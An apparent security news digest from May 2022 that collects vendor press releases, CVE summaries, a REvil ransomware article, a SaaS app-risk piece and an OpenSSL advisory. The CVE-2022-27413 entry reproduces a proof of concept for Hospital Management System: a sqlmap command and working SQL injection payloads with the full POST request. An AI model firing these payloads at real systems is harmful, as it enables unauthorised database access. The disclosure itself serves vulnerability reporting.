The security research partnership will focus on developing new techniques and releasing them as open source.

Aryaka and CyLab, Carnegie Mellon University’s Security and Privacy Institute, announced a strategic partnership to research new threat mitigation techniques and develop new enterprise networking and security solutions.

Under the partnership, Aryaka will provide funding and industry experts to assist more than 100 faculty members and 100 graduate students with research to identify, prioritize, and develop threat mitigation techniques. The hope is to make these techniques available as open source to help enterprises and security vendors to better defend against cyberattacks, CyLab’s Daniel Tkacik wrote.

The modern IT landscape is very different from when users were in offices and applications were in data centers, said Renuka Nadkarni, Aryaka’s chief product officer. Applications are now anywhere and users can access those applications regardless of their geographic location. Security needs to be reconsidered in the case of the application and not the network.

Aryaka is also the founding sponsor of CyLab’s Future Enterprise Security Initiative, a multi-disciplinary approach to making complex security solutions available and accessible. The initiative’s mission is to rethink “security across enterprise ecosystems through innovations in artificial intelligence, computer science, engineering, and human factors research,” Tkacik wrote.

Founded in 2003, CyLab is a public/private collaborative computer security and privacy research institute and is one of the largest security research centers in the US. Aryaka decided to partner with CyLab because of the university’s work in artificial intelligence and machine learning as well as in other fields such as humanities, psychology, and policy, said David Ginsburg, Aaryaka’s VP of product and solutions marketing. A multi-disciplinary approach gives researchers the opportunity to look at problems not just from the technology point of view, but to also consider attacker motivations and intent.

Aryaka will guide research topics, offer industry expertise, provide data sets for building AI models, and give feedback on techniques being developed.

Aryaka, Carnegie Mellon’s CyLab to Research New Threat Mitigation Techniques

IT Teams can now manage, detect, and secure all endpoints with 100% visibility across desktop, laptop, server, and mobile devices.

  
ALISO VIEJO, Calif. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more.

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices).

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status.

Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.

Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.

Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network.

Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.

Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly.

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxsense.com

Syxsense Enterprise Unifies Endpoint Security and IT Management for Real-Time Vulnerability Monitoring and Remediation

Latest round led by IVP values the company at $450 million.

SAN FRANCISCO, May 3, 2022 — Traceable AI, the API security & observability company, today announced it has raised $60 million in Series B funding. This new funding values Traceable AI at more than $450 million. This investment round was led by Institutional Venture Partners (IVP), and other investors include Tiger Global Management and existing investors Unusual Ventures and BIG Labs. Traceable AI plans to use this round of funding to accelerate its next phase of growth by further investing in its product development and research efforts, expanding its sales and marketing teams, and expanding global sales.

“API security has become a major security and compliance concern for most companies,” said Steve Harrick, general partner, IVP. “Traceable offers a fundamentally differentiated solution that provides coverage across the full DevSecOps software lifecycle — from API development and testing to runtime protection. The company is led by Jyoti Bansal and Sanjay Nagaraj, proven entrepreneurs who we have been fortunate to work with before. They listen to customer needs and know how to deliver software at scale.”

Traceable was started two years ago by AppDynamics and Harness founder Jyoti Bansal and former AppDynamics VP of Engineering Sanjay Nagaraj through a $20 million Series A in July 2020.

"Widespread use of APIs in cloud-native applications has led to a significantly larger attack surface, intensifying the challenge of protecting these APIs from malicious usage or abuse,” said Bansal. “Bad actors only need one API entry point to access an organization’s data and cause irreparable financial, reputational and service interruptions damage. Traceable AI applies the power of machine learning and distributed tracing to truly understand how an application really works in the context of the business, and therefore, be able to detect anomalies and block threats to keep customers secure and resilient against next-gen attacks.”

By leveraging the team's expertise in distributed tracing and observability, Traceable AI is the only API security platform that discovers, manages and secures APIs for enterprise-level organizations. Their differentiated capabilities provide coverage for the most important API security use cases, including API discovery, sensitive data exfiltration, and detecting and blocking attacks such as account takeover, API abuse and API fraud.

“As we know, all businesses are run by software. Given that APIs are the core engine of any software model today, it’s imperative that we secure them to protect the business”, said John Vrionis, partner at Unusual Ventures. “We are extremely excited to be a part of the Traceable team and their continued efforts to help enterprises secure their most important software asset – APIs.”

**Traceable AI Use Cases**

Traceable AI provides the industry’s leading API security platform that discovers, manages, and secures all APIs against malicious attacks and provides rich analytics to perform threat hunting, so you can make the right decisions regarding your API security posture.

A wide range of companies, including Informatica, Bullish, Digital Ocean, Zolve, Houwzer and many large finance firms utilize Traceable AI’s innovative distributed tracing technology to secure their cloud-native applications.

“We want to detect and respond to breaches in the shortest time possible,” said Pathik Patel, head of cloud security at Informatica. “The most important part is to figure out how much visibility we have into our environment and how quickly we can find the root causes and remediate those items. Traceable AI deploys across any environment, whether it’s your cloud, Kubernetes, or traditional virtual machines. Knowing how our applications behave as a part of API discovery is what created the win for the Traceable AI team at Informatica.”

“Businesses are now API driven and increasingly susceptible to business logic abuse and generic vulnerabilities like Log4Shell/Spring4shell. A holistic approach is needed to protect APIs from known and unknown threats across environments by understanding their production and pre-production environments,” said Nagaraj. “Traceable AI fits into a company’s existing infrastructure quickly and without friction. We offer agentless deployment options, including out-of-band traffic mirroring, to make sure our platform fits the needs of our customers.”

**About Traceable AI**

Traceable protects APIs from the inside by understanding the unique business logic, user attribution, and context of each API – from development through production. With our distributed tracing technology and advanced context-based behavioral analytics, we deliver modern API security to your cloud-native and API-based applications. Learn more at https://traceable.ai.

API Security Company Traceable AI Lands $60 Million Series B

Mattermost Playbooks plugin 1.25 and earlier fails to properly restrict user-level permissions, which allows playbook members to escalate their membership privileges and perform actions restricted to playbook admins.

CVE-2022-1548: Security Updates

RIOT OS version 2020.01.1 is vulnerable to integer wrap-around in its implementation of calloc function, which can lead to arbitrary memory allocation, resulting in unexpected behavior such as a crash or a remote code injection/execution.

        

The friendly Operating System for IoT!

RIOT is a real-time multi-threading operating system that supports a range of devices that are typically found in the Internet of Things (IoT): 8-bit, 16-bit and 32-bit microcontrollers.

RIOT is based on the following design principles: energy-efficiency, real-time capabilities, small memory footprint, modularity, and uniform API access, independent of the underlying hardware (this API offers partial POSIX compliance).

RIOT is developed by an international open source community which is independent of specific vendors (e.g. similarly to the Linux community). RIOT is licensed with LGPLv2.1, a copyleft license which fosters indirect business models around the free open-source software platform provided by RIOT, e.g. it is possible to link closed-source code with the LGPL code.

**FEATURES**

RIOT is based on a microkernel architecture, and provides features including, but not limited to:

*   a preemptive, tickless scheduler with priorities
*   flexible memory management
*   high resolution, long-term timers
*   support 100+ boards based on AVR, MSP430, ESP8266, ESP32, MIPS, RISC-V, ARM7 and ARM Cortex-M
*   the native port allows to run RIOT as-is on Linux, BSD, and MacOS. Multiple instances of RIOT running on a single machine can also be interconnected via a simple virtual Ethernet bridge
*   IPv6
*   6LoWPAN (RFC4944, RFC6282, and RFC6775)
*   UDP
*   RPL (storing mode, P2P mode)
*   CoAP
*   CCN-Lite
*   Sigfox
*   LoRaWAN

**GETTING RIOT**

The most convenient way to get RIOT is to clone it via Git

$ git clone https://github.com/RIOT-OS/RIOT

this will ensure that you get all the newest features and bug fixes with the caveat of an ever changing work environment.

If you prefer things more stable, you can download the source code of one of our quarter annual releases via Github as ZIP file or tarball. You can also checkout a release in a cloned Git repository using

$ git pull --tags
$ git checkout <YYYY.MM\>

For more details on our release cycle, check our documentation.

**GETTING STARTED**

*   You want to start the RIOT? Just follow our quickstart guide or try this tutorial. For specific toolchain installation, follow instructions in the getting started page.
*   The RIOT API itself can be built from the code using doxygen. The latest version of the documentation is uploaded daily to doc.riot-os.org.

**FORUM**

Do you have a question, want to discuss a new feature, or just want to present your latest project using RIOT? Come over to our forum and post to your hearts content.

**CONTRIBUTE**

To contribute something to RIOT, please refer to our contributing document.

**MAILING LISTS**

*   RIOT commits: commits@riot-os.org
*   Github notifications: notifications@riot-os.org

**LICENSE**

*   Most of the code developed by the RIOT community is licensed under the GNU Lesser General Public License (LGPL) version 2.1 as published by the Free Software Foundation.
*   Some external sources, especially files developed by SICS are published under a separate license.

All code files contain licensing information.

For more information, see the RIOT website:

https://www.riot-os.org

CVE-2021-27427: GitHub - RIOT-OS/RIOT: RIOT -  The friendly OS for IoT

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php.

****Hospital-Management-System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is admin.php

http://you ip/HMS/admin.php

Hospital-Management-System v1.0

The adminname parameter in the admin.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

python3 sqlmap.py -r Your post packet.txt --random-agent --risk=3 --level=3 -dbs

\[+\] Payloads:

    Parameter: adminname ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
        Payload: adminname=admin' AND EXTRACTVALUE(4756,CONCAT(0x5c,0x717a706a71,(SELECT (ELT(4756=4756,1))),0x7170707a71)) AND 'hOiE'='hOiE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=admin' AND (SELECT 3117 FROM (SELECT(SLEEP(5)))xtHJ) AND 'beHE'='beHE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    ---
    

\[+\]Post request package

    POST /HMS/admin.php HTTP/1.1
    Host: 192.168.10.7
    Content-Length: 119
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.10.7
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.10.7/HMS/admin.php
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    adminname=admin1&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
    

**In action:**

**Proof and Exploit:**

href

CVE-2022-27413: GitHub - HH1F/Hospital-Management-System-V1.0-SQLi

The infamous ransomware group appears to be back from the dead — maybe — and using the old brand, but experts question whether a reconstituted gang will have much success.

Evidence that members of the defunct REvil group may be reviving the ransomware gang continues to accumulate, but cybersecurity experts question whether the group will have the same impact that it once did.

On April 29, anti-malware firm Avast revealed that the company's software had blocked a ransomware sample that appeared to be generated using information that only previous members of the REvil group could have accessed. The discovery of the file came more than a week after cybersecurity firm Emsisoft revealed that the Web address of REvil's leak site now points to a new host, using both the REvil name and claiming to have compromised a US university and an oil company in India.

These two breadcrumbs suggest that someone (or someones) has access to the REvil group's source code and infrastructure and may be restarting the operation, says Brett Callow, threat analyst at Emsisoft. They don't, however, prove it's the old crew getting back together.

"These facts do not necessarily prove ... that the old REvil gang is back," he says. "Instead, they simply indicate that one or more people who were previously connected with the operation have decided to pick up the reins."

Either way, the apparent resurrection of the group highlights the difficulty that cybersecurity professionals, law enforcement, and prosecutors have in disrupting successful cybercriminal groups. 

Following the critical attacks on meat processor JBS and IT management firm Kaseya in 2021, REvil shut down for a few months but reappeared in September. Then in January, Russian officials reportedly arrested 14 members of the group and raided more than two dozen locations, raising hopes that the takedown would last.

Instead, the group seems to have fragmented, with members working with other ransomware operations. Now some members may be making a half-hearted attempt to resurrect the REvil brand, but the tepid revival raises the question of what constitutes a group, as a couple of satellite members working together to re-create the ransomware gang's operation would not seem to pose an equal threat, Callow says.

"The fact that the new operation appears to be linked to REvil doesn’t make the threat it poses any more or less serious," he says, adding that he finds it "somewhat surprising to see the ransomware revived as, after being compromised by law enforcement, you’d think affiliates and service providers would have no confidence in the integrity of any operation connected with REvil."

**Broken Malware, Bold Claims  
**The latest concerns over yet another revival of REvil come after Callow posted a screenshot of the redirected leak blog on Twitter on April 20, and — more than a week later — Avast security researcher Jakub Kroustek posted screenshots of malware that may have been a test, as it did not attempt to encrypt anything.

"This sample was detected so called 'in-the-wild,' meaning in our user-base on one of the computers protected by Avast," Kroustek said in an email interview with Dark Reading. "We believe this machine belongs to a threat actor that was using it for testing the detection capabilities. These were obviously solid enough to trigger the detection."

He added that the malware sample, which he said no other firm has captured to date, indicates that they are augmenting the capabilities of the original REvil ransomware.

"The code itself does not look any more dangerous compared to the previous versions, \[but\] the simple fact that we see this threat active again is disturbing," he said. "Furthermore, the discovered sample was modified in a way that its core feature, file encryption, was disabled. This may indicate that the actor is testing and developing it for future malware campaigns."

**Zombie Malware**

The reappearance is also not the first time that groups have claimed the REvil mantle. A year ago, a group known as Prometheus started compromising a variety of organizations — at least 30 by mid-2021 — claiming a tenuous heritage linking the group to REvil.  

Furthermore, REvil is not the only group with nine lives. In early April, a group known as Black Cat, or ALPHV — and possibly including operators of the now-defunct BlackMatter group as members — began using a tool called FENDR, only previously available to the BlackMatter group. Also, last November, the Emotet botnet came back from the dead, more than 10 months after a task force of international law enforcement teamed with technology companies shut down the endemic Trojan.

**Ransomware Continues to Wreak Havoc  
**Despite the seeming chaos of groups disappearing, reconstituting, and rebranding themselves, ransomware continues to grow as a threat to companies, their data, and their operations. In a recent survey, 43% of companies claimed to have had data encrypted by ransomware in 2021, up from 20% in 2020. In addition, the average ransomware paid to attackers quadrupled to more than $800,000, with a total cost of $1.4 million to remediate the average attack.

With such alluring profits, stamping out cybercriminals protected by some foreign jurisdictions is nearly impossible, says Emsisoft's Callow.

"We talk about ‘groups,’ but the reality is that outside of the core membership, they’re amorphous collections of individuals who provide services or ‘rent’ access to ransomware to use in attacks — and some of these individuals cooperate with multiple groups simultaneously," he says. "You can’t eradicate groups. You can only make it harder for them to operate. It’s all about increasing their risks while decreasing their rewards."

REvil Revival: Are Ransomware Gangs Ever Really Gone?

Syxsense Enterprise delivers real-time vulnerability monitoring and remediation for all endpoints across an organization’s entire network.

**ALISO VIEJO, Calif**. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more. 

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices). 

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

*   Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status. 
*   Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.
*   Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.
*   Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network. 
*   Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.
*   Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly. 

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxse

Syxsense Launches Unified Endpoint Security and Management Platform

By providing these apps and other add-ons for SaaS platforms and associated permissions, businesses present bad actors with more opportunities to gain access to company data.

Actions that a user takes from creating an email to updating a contact in the CRM system can result in several other automatic actions and notifications in the connected platforms. However, this SaaS-to-SaaS communication and supply chain is an emerging threat in the corporate cybersecurity landscape.

It bears repeating: Third-party app access is the new executable file. An innocuous process much like clicking on an email attachment, people don't think twice when connecting an app they need with their Google Workspace or Microsoft 365 environment. These third-party apps can boost productivity, enable remote and hybrid work, and are overall essential in building and scaling a company's work processes.

The OAuth mechanism makes it extremely easy to interconnect apps, and many users simply click "accept" without considering what permissions these apps are asking for — or what the possible ramifications could be. By providing these apps and other add-ons for SaaS platforms with permissions' access, businesses are presenting more opportunities for bad actors to gain access to a company's data. This puts companies at risk for supply chain access attacks, API takeovers, and malicious third-party apps. Once a bad actor is able to infiltrate one platform, they potentially have access to all of the users' connected SaaS apps.

Nowadays, when it comes to local machines and executable files, organizations already have control built in that enables security teams to block problematic programs and files. It needs to be the same when it comes to SaaS apps.

We conducted field research from within our customers' environments to identify just how many third-party apps were connected to their instances of Google Workspace, M365, and Salesforce. On average, there were approximately 150 SaaS apps connected to these business-critical apps**,** unbeknownst to the security team.

OAuth 2.0 has greatly simplified authentication and authorization, and offers a fine-grained delegation of access rights. Represented in the form of scopes, an application asks for the user's authorization for specific permissions. An app can request one or more scopes. Through approval of the scopes, the user grants these apps permissions to execute code to perform logic behind the scenes within their environment. These apps can be harmless or as threatening as an executable file.

Third-party app access is just one component of the SaaS security posture management picture. Recent surveys have shown that an enterprise with 1,000 or more employees is likely to use more than 150 SaaS apps to run the business. While each individual SaaS app comes with built-in native security controls, it is up to the organization to ensure that all the configurations and user permissions are correct.

Further complicating matters is the fact that no two apps are the same — each has unique terminology, environment, and organization of their security configurations. Understanding every app's "language" and managing the complex, ever-changing environment, now with the additional third-party app access risk, opens organizations up to even more exposure and vulnerability.

**Best Practices to Mitigate Third-Party App Access Risk  
**To secure a company's SaaS stack, the security team needs to be able to identify and monitor all that happens within their SaaS ecosystem. Here's what a security team can share with employees and handle themselves to mitigate third-party app access risk. 

**Educate Employees  
**The first step in cybersecurity always comes back to raising awareness. Once employees become more aware of the risks and dangers that these OAuth mechanisms present, they will be more hesitant to use them. Organizations should also create a policy that requires employees to submit requests for third-party apps.

**Get Visibility Into Third-Party Access for All Business-Critical Apps  
**Security teams should gain visibility into every business-critical app and review all the different third-party apps that have been integrated with their business-critical SaaS apps — across all tenets. One of the first steps when shrinking the threat surface is gaining an understanding of the full environment.

**Map Permissions and Access Levels Requested by Connected Third-Party Apps  
**Once the security team knows which third party apps are connected, it should map the permissions and the types of access that each third-party app has been given. From there, it will be able to see which third-party app presents a higher risk. Being able to differentiate between an app that can read versus an app that can write will help the security team prioritize which needs to be handled first.

In addition, the security team should map which users granted these permissions. For example, a high-privileged user, someone who has sensitive documents in their workspace, who grants access to a third-party app can present a high risk to the company, and this needs to be remediated immediately.

These best practices are just the start for a cybersecurity department to better ensure its organization's SaaS security hygiene remains intact.

Third-Party App Access Is the New Executable File

The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).

OpenSSL Security Advisory \[03 May 2022\] =========================================== The c\_rehash script allows command injection (CVE-2022-1292) ============================================================ Severity: Moderate The c\_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c\_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. OpenSSL 1.0.2 users should upgrade to 1.0.2ze (premium support customers only) OpenSSL 1.1.1 users should upgrade to 1.1.1o OpenSSL 3.0 users should upgrade to 3.0.3 This issue was reported to OpenSSL on the 2nd April 2022. It was found by Elison Niven of Sophos. The fix was developed by Tomas Mraz from OpenSSL. OCSP\_basic\_verify may incorrectly verify the response signing certificate (CVE-2022-1343) ========================================================================================= Severity: Moderate The function \`OCSP\_basic\_verify\` verifies the signer certificate on an OCSP response. In the case where the (non-default) flag OCSP\_NOCHECKS is used then the response will be positive (meaning a successful verification) even in the case where the response signing certificate fails to verify. It is anticipated that most users of \`OCSP\_basic\_verify\` will not use the OCSP\_NOCHECKS flag. In this case the \`OCSP\_basic\_verify\` function will return a negative value (indicating a fatal error) in the case of a certificate verification failure. The normal expected return value in this case would be 0. This issue also impacts the command line OpenSSL "ocsp" application. When verifying an ocsp response with the "-no\_cert\_checks" option the command line application will report that the verification is successful even though it has in fact failed. In this case the incorrect successful response will also be accompanied by error messages showing the failure and contradicting the apparently successful result. This issue affects OpenSSL version 3.0. OpenSSL 3.0 users should upgrade to 3.0.3 This issue was reported to OpenSSL on the 6th April 2022 by Raul Metsma. The fix was developed by Matt Caswell from OpenSSL. Incorrect MAC key used in the RC4-MD5 ciphersuite (CVE-2022-1434) ================================================================= Severity: Low The OpenSSL 3.0 implementation of the RC4-MD5 ciphersuite incorrectly uses the AAD data as the MAC key. This makes the MAC key trivially predictable. An attacker could exploit this issue by performing a man-in-the-middle attack to modify data being sent from one endpoint to an OpenSSL 3.0 recipient such that the modified data would still pass the MAC integrity check. Note that data sent from an OpenSSL 3.0 endpoint to a non-OpenSSL 3.0 endpoint will always be rejected by the recipient and the connection will fail at that point. Many application protocols require data to be sent from the client to the server first. Therefore, in such a case, only an OpenSSL 3.0 server would be impacted when talking to a non-OpenSSL 3.0 client. If both endpoints are OpenSSL 3.0 then the attacker could modify data being sent in both directions. In this case both clients and servers could be affected, regardless of the application protocol. Note that in the absence of an attacker this bug means that an OpenSSL 3.0 endpoint communicating with a non-OpenSSL 3.0 endpoint will fail to complete the handshake when using this ciphersuite. The confidentiality of data is not impacted by this issue, i.e. an attacker cannot decrypt data that has been encrypted using this ciphersuite - they can only modify it. In order for this attack to work both endpoints must legitimately negotiate the RC4-MD5 ciphersuite. This ciphersuite is not compiled by default in OpenSSL 3.0, and is not available within the default provider or the default ciphersuite list. This ciphersuite will never be used if TLSv1.3 has been negotiated. In order for an OpenSSL 3.0 endpoint to use this ciphersuite the following must have occurred: 1) OpenSSL must have been compiled with the (non-default) compile time option enable-weak-ssl-ciphers 2) OpenSSL must have had the legacy provider explicitly loaded (either through application code or via configuration) 3) The ciphersuite must have been explicitly added to the ciphersuite list 4) The libssl security level must have been set to 0 (default is 1) 5) A version of SSL/TLS below TLSv1.3 must have been negotiated 6) Both endpoints must negotiate the RC4-MD5 ciphersuite in preference to any others that both endpoints have in common This issue affects OpenSSL version 3.0. OpenSSL 3.0 users should upgrade to 3.0.3 This issue was reported to OpenSSL on the 14th April 2022 by Tom Colley (Broadcom). The fix was developed by Matt Caswell from OpenSSL. Resource leakage when decoding certificates and keys (CVE-2022-1473) ==================================================================== Severity: Low The OPENSSL\_LH\_flush() function, which empties a hash table, contains a bug that breaks reuse of the memory occuppied by the removed hash table entries. This function is used when decoding certificates or keys. If a long lived process periodically decodes certificates or keys its memory usage will expand without bounds and the process might be terminated by the operating system causing a denial of service. Also traversing the empty hash table entries will take increasingly more time. Typically such long lived processes might be TLS clients or TLS servers configured to accept client certificate authentication. The function was added in the OpenSSL 3.0 version thus older releases are not affected by the issue. It was addressed in the 3.0.3 release on the 3rd May 2022. The fix can be found in git commit 64c85430f. OpenSSL 1.0.2 users are not affected. OpenSSL 1.1.1 users are not affected. OpenSSL 3.0 users should upgrade to 3.0.3. This issue was reported to OpenSSL on the 21st April 2022 by Aliaksei Levin. The fix was developed by Hugo Landau from OpenSSL. Note ==== OpenSSL 1.0.2 is out of support and no longer receiving public updates. Extended support is available for premium support customers: https://www.openssl.org/support/contracts.html OpenSSL 1.1.0 is out of support and no longer receiving updates of any kind. The impact of these issues on OpenSSL 1.1.0 has not been analysed. Users of these versions should upgrade to OpenSSL 3.0 or 1.1.1. References ========== URL for this Security Advisory: https://www.openssl.org/news/secadv/20220503.txt Note: the online version of the advisory may be updated with additional details over time. For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html

Tag

#mac